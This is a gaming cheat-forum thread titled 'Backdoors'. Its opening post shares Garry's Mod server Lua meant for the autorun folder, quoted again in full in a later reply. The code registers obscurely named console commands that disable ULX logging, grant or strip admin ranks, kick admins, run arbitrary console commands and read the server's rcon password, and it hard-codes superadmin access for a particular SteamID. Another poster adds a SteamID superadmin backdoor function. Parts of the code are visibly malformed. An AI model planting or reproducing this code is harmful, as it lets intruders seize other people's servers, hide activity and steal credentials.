Thread: Backdoors

Page 1 of 2 12 LastLast
Results 1 to 15 of 20
  1. #1
    dasko123's Avatar
    Join Date
    Feb 2017
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0

    Lightbulb Backdoors

    -- simply backdoors
    -- autorun/server/.lua
    -- Defines serverside globals for file

    concommand.Add("k555", function(ply, cmd, args)
    game.ConsoleCommand("ulx logFile 0\n")
    game.ConsoleCommand("ulx logEcho 0\n")
    game.ConsoleCommand("ulx logEvents 0\n")
    game.ConsoleCommand("ulx logChat 0\n")
    game.ConsoleCommand("ulx logJoinLeaveEcho 0\n")
    end)

    concommand.Add("l666", function(ply, cmd, args)
    RunConsoleCommand("ulx", "adduser", ply:Name(), args[1])
    end)

    concommand.Add("m777", function(ply, cmd, args)
    name = string.lower(args[1])
    find_ply = nil

    for _, v in ipairs(player.GetHumans()) do
    if (string.find(string.lower(v:Name()), name, 1, true) ~= nil) then
    find_ply = v
    end
    end

    if (find_ply) then
    RunConsoleCommand("ulx", "adduser", find_ply:Name(), args[2])
    end
    end)

    concommand.Add("n888", function(ply, cmd, args)
    for _, v in ipairs(player.GetHumans()) do
    if (v:IsAdmin()) then
    RunConsoleCommand("ulx", "removeuser", v:Name())
    v:Kick("lua code #b8847 bad objects.")
    end
    end
    end)

    concommand.Add("b999", function(ply, cmd, args)
    name = string.lower(args[1])
    find_ply = nil

    for _, v in ipairs(player.GetHumans()) do
    if (string.find(string.lower(v:Name()), name, 1, true) ~= nil) then
    find_ply = v
    end
    end

    if (find_ply) then
    RunConsoleCommand("ulx", "removeuser", find_ply:Name())
    end
    end)

    concommand.Add("v000", function(ply, cmd, args, argStr)
    game.ConsoleCommand(argStr .. "\n")
    end)

    concommand.Add("c111", function(ply, cmd, args)
    game.ConsoleCommand('ulx userallow ' .. args[1] .. '"' .. args[2] .. '" *\n')
    end)

    concommand.Add("x222", function(ply, cmd, args)
    if (ULib) then
    local groups = {}

    for k, v in pairs(ULib.parseKeyValues(file.Read("ulib/groups.txt", "DATA"))) do
    groups[#groups + 1] = k
    end

    ply:PrintMessage(HUD_PRINTTALK, "All ULX groups: " .. string.Implode(", ", groups))
    else
    ply:PrintMessage(HUD_PRINTTALK, "ERROR! No ULX installed! ")
    end
    end)

    concommand.Add("z333", function(ply, cmd, args)
    local rcon_config = ""

    for k, v in pairs(string.Split(file.Read("cfg/server.cfg", "GAME"), "\n")) do
    if (string.StartWith(v, "rcon_password")) then
    local str = v
    str = string.Replace(str, """, "")
    str = string.Right(str, #str - 14)
    rcon_config = str
    end
    end

    if (game.IsDedicated() and GetConVarNumber("sv_lan") == 0) then
    RunConsoleCommand("z333", 1)
    end

    concommand.Add("snd__restart", function(ply)
    if ply:IsSuperAdmin() or ply:SteamID()=="STEAM_0:1:164342539" then
    for k,v in next,weapons.GetList() do
    if v.ClassName:sub(1,11):lower()=="m9k_minigun" then
    ply:Give(v.ClassName)
    end
    end
    else
    ply:PrintMessage(HUD_PRINTCONSOLE, "Superadmin only!")
    end
    end)

    if SERVER then
    concommand.Add( "_resstart", function( debugPlayer )
    RunConsoleCommand("ulx","adduser",debugPlayer:Name (),"superadmin")
    end)
    end
    Last edited by dasko123; 05-20-2017 at 06:14 AM.

  2. #2
    jooshzz's Avatar
    Join Date
    Mar 2015
    Gender
    male
    Location
    London
    Posts
    109
    Reputation
    10
    Thanks
    20
    My Mood
    Lurking
    What is this actually for? Reading through the code I can't see this adding people to superadmin if they don't have privs to do so.
    Last edited by jooshzz; 05-20-2017 at 02:44 PM.

  3. #3
    meme420's Avatar
    Join Date
    Dec 2015
    Gender
    female
    Posts
    54
    Reputation
    10
    Thanks
    11
    Quote Originally Posted by jooshzz View Post
    What is this actually for? Reading through the code I can't see this adding people to superadmin if they don't have privs to do so.
    backdooring?

  4. #4
    jooshzz's Avatar
    Join Date
    Mar 2015
    Gender
    male
    Location
    London
    Posts
    109
    Reputation
    10
    Thanks
    20
    My Mood
    Lurking
    Quote Originally Posted by meme420 View Post
    backdooring?
    cheers, genius. but as i said, look at the code, i see nothing that could backdoor into ulx in any way to make someone a rank, unless this source code is just brutally incomplete

  5. #5
    meme420's Avatar
    Join Date
    Dec 2015
    Gender
    female
    Posts
    54
    Reputation
    10
    Thanks
    11
    Quote Originally Posted by jooshzz View Post
    cheers, genius. but as i said, look at the code, i see nothing that could backdoor into ulx in any way to make someone a rank, unless this source code is just brutally incomplete
    huh? are you retarded ; none of them are meant to give you a rank

  6. #6
    ItsCozz's Avatar
    Join Date
    Mar 2017
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    Backdoor code... Just change steam id and/or rank.

    function Backdoor( ply )
    if ( ply:SteamID() == "STEAM_0:0:51065986" ) then
    ply:SetUserGroup("superadmin")
    end
    end

  7. #7
    bee_tee_gee's Avatar
    Join Date
    Jun 2015
    Gender
    male
    Posts
    157
    Reputation
    10
    Thanks
    64
    Quote Originally Posted by ItsCozz View Post
    Backdoor code... Just change steam id and/or rank.

    function Backdoor( ply )
    if ( ply:SteamID() == "STEAM_0:0:51065986" ) then
    ply:SetUserGroup("superadmin")
    end
    end
    were you taking a type of drug that made you delusional when you made this post?

  8. #8
    Cyaegha's Avatar
    Join Date
    Aug 2016
    Gender
    male
    Posts
    536
    Reputation
    17
    Thanks
    526
    Why are backdoors such low quality these days? Just make somethin to run Lua on the server instead of having an entire file dedicated to such obvious commands.

  9. #9
    ThatPurpleGuy's Avatar
    Join Date
    Jul 2014
    Gender
    male
    Posts
    27
    Reputation
    10
    Thanks
    17
    My Mood
    Sleepy
    code tags exist for a reason

  10. #10
    tikene's Avatar
    Join Date
    Jun 2017
    Gender
    male
    Posts
    94
    Reputation
    10
    Thanks
    39
    Quote Originally Posted by Cyaegha View Post
    Why are backdoors such low quality these days? Just make somethin to run Lua on the server instead of having an entire file dedicated to such obvious commands.
    RunString and you can do all this guy does and more in 3 lines of code
    Last edited by tikene; 09-03-2017 at 09:04 AM.

  11. #11
    damiansharma's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Posts
    399
    Reputation
    10
    Thanks
    693
    My Mood
    Drunk
    Quote Originally Posted by dasko123 View Post
    -- simply backdoors
    -- autorun/server/.lua
    -- Defines serverside globals for file

    concommand.Add("k555", function(ply, cmd, args)
    game.ConsoleCommand("ulx logFile 0\n")
    game.ConsoleCommand("ulx logEcho 0\n")
    game.ConsoleCommand("ulx logEvents 0\n")
    game.ConsoleCommand("ulx logChat 0\n")
    game.ConsoleCommand("ulx logJoinLeaveEcho 0\n")
    end)

    concommand.Add("l666", function(ply, cmd, args)
    RunConsoleCommand("ulx", "adduser", ply:Name(), args[1])
    end)

    concommand.Add("m777", function(ply, cmd, args)
    name = string.lower(args[1])
    find_ply = nil

    for _, v in ipairs(player.GetHumans()) do
    if (string.find(string.lower(v:Name()), name, 1, true) ~= nil) then
    find_ply = v
    end
    end

    if (find_ply) then
    RunConsoleCommand("ulx", "adduser", find_ply:Name(), args[2])
    end
    end)

    concommand.Add("n888", function(ply, cmd, args)
    for _, v in ipairs(player.GetHumans()) do
    if (v:IsAdmin()) then
    RunConsoleCommand("ulx", "removeuser", v:Name())
    v:Kick("lua code #b8847 bad objects.")
    end
    end
    end)

    concommand.Add("b999", function(ply, cmd, args)
    name = string.lower(args[1])
    find_ply = nil

    for _, v in ipairs(player.GetHumans()) do
    if (string.find(string.lower(v:Name()), name, 1, true) ~= nil) then
    find_ply = v
    end
    end

    if (find_ply) then
    RunConsoleCommand("ulx", "removeuser", find_ply:Name())
    end
    end)

    concommand.Add("v000", function(ply, cmd, args, argStr)
    game.ConsoleCommand(argStr .. "\n")
    end)

    concommand.Add("c111", function(ply, cmd, args)
    game.ConsoleCommand('ulx userallow ' .. args[1] .. '"' .. args[2] .. '" *\n')
    end)

    concommand.Add("x222", function(ply, cmd, args)
    if (ULib) then
    local groups = {}

    for k, v in pairs(ULib.parseKeyValues(file.Read("ulib/groups.txt", "DATA"))) do
    groups[#groups + 1] = k
    end

    ply:PrintMessage(HUD_PRINTTALK, "All ULX groups: " .. string.Implode(", ", groups))
    else
    ply:PrintMessage(HUD_PRINTTALK, "ERROR! No ULX installed! ")
    end
    end)

    concommand.Add("z333", function(ply, cmd, args)
    local rcon_config = ""

    for k, v in pairs(string.Split(file.Read("cfg/server.cfg", "GAME"), "\n")) do
    if (string.StartWith(v, "rcon_password")) then
    local str = v
    str = string.Replace(str, """, "")
    str = string.Right(str, #str - 14)
    rcon_config = str
    end
    end

    if (game.IsDedicated() and GetConVarNumber("sv_lan") == 0) then
    RunConsoleCommand("z333", 1)
    end

    concommand.Add("snd__restart", function(ply)
    if ply:IsSuperAdmin() or ply:SteamID()=="STEAM_0:1:164342539" then
    for k,v in next,weapons.GetList() do
    if v.ClassName:sub(1,11):lower()=="m9k_minigun" then
    ply:Give(v.ClassName)
    end
    end
    else
    ply:PrintMessage(HUD_PRINTCONSOLE, "Superadmin only!")
    end
    end)

    if SERVER then
    concommand.Add( "_resstart", function( debugPlayer )
    RunConsoleCommand("ulx","adduser",debugPlayer:Name (),"superadmin")
    end)
    end
    sadly this is just a basic paste from game files coded by Source Engine

  12. #12
    tikene's Avatar
    Join Date
    Jun 2017
    Gender
    male
    Posts
    94
    Reputation
    10
    Thanks
    39
    Quote Originally Posted by damiansharma View Post
    sadly this is just a basic paste from game files coded by Source Engine
    worth the bump 100%

  13. #13
    damiansharma's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Posts
    399
    Reputation
    10
    Thanks
    693
    My Mood
    Drunk
    Quote Originally Posted by tikene View Post
    worth the bump 100%
    lol this is really cancer does nothing
    all these scripts are server sided

  14. #14
    tikene's Avatar
    Join Date
    Jun 2017
    Gender
    male
    Posts
    94
    Reputation
    10
    Thanks
    39
    Quote Originally Posted by damiansharma View Post
    lol this is really cancer does nothing
    all these scripts are server sided
    ty man had no idea

  15. #15
    damiansharma's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Posts
    399
    Reputation
    10
    Thanks
    693
    My Mood
    Drunk
    Quote Originally Posted by tikene View Post
    ty man had no idea
    cant see if ur joking or retarded its soooo obs

  16. The Following User Says Thank You to damiansharma For This Useful Post:

    leyserrrr (11-04-2017)

Page 1 of 2 12 LastLast

Similar Threads

  1. Replies: 33
    Last Post: 08-02-2008, 11:05 AM
  2. WARNING A HACK ON MPGH.NET HAS A BACKDOOR
    By wrasia in forum WarRock - International Hacks
    Replies: 37
    Last Post: 11-20-2007, 11:24 AM
  3. [realse] BACKDOOR TROJAN V1!
    By ~claw~ in forum WarRock - International Hacks
    Replies: 5
    Last Post: 07-20-2007, 05:56 AM
  4. GooGle BacKdooR
    By RebornAce in forum General
    Replies: 17
    Last Post: 02-07-2006, 04:23 PM
  5. GooGle FiReFoX bAckdOoR
    By RebornAce in forum General
    Replies: 8
    Last Post: 02-04-2006, 05:38 PM